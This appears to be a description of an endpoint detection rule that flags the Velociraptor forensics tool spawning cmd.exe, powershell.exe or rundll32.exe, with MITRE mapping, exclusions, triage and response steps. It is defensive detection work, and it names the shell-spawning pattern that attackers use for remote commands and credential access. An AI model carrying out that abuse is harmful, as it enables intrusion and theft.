Detects suspicious shell executions on Windows endpoints where Velociraptor (velociraptor.exe) acts as the parent process and spawns a child process from the set {cmd.exe, powershell.exe, rundll32.exe}. The rule flags scenarios where Velociraptor is used to execute shell commands, which threat actors have observed for post-compromise activity, including command execution, lateral movement, and credential access actions. To reduce noise, the rule excludes known Velociraptor artifact patterns and encoded/safe commands that are legitimate Velociraptor operations (e.g., certain Get-LocalGroupMember or registry queries, and specific obfuscated payloads). The detection maps to MITRE ATT&CK T1219 (Remote Access Tools) with the subtechnique T1219.002 (Remote Desktop Software) as a representative technique for remote shell or RAT-style activity. The query investigates Windows process start events where the parent is Velociraptor and the child is one of the shell executables, while filtering out benign Velociraptor commands and known-good artifacts. It leverages data from multiple EDR/SIEM sources to corroborate events (e.g., Sysmon process events, Windows Security Event Logs, and endpoint telemetry). Investigation focus includes confirming the Velociraptor installation path and code signature, examining the child process command line for suspicious activity (e.g., download, lateral movement, credential queries), and correlating with other alerts (initial access, persistence, C2). False positives may occur with legitimate Velociraptor usage; consider allowlisting by command-line pattern or host if IR/DFIR activity is authorized. Response steps include isolating the host, terminating Velociraptor and the spawned shell process, removing Velociraptor deployments, and rotating credentials. If deployment is authorized, tune the rule or add approved exceptions to reduce noise.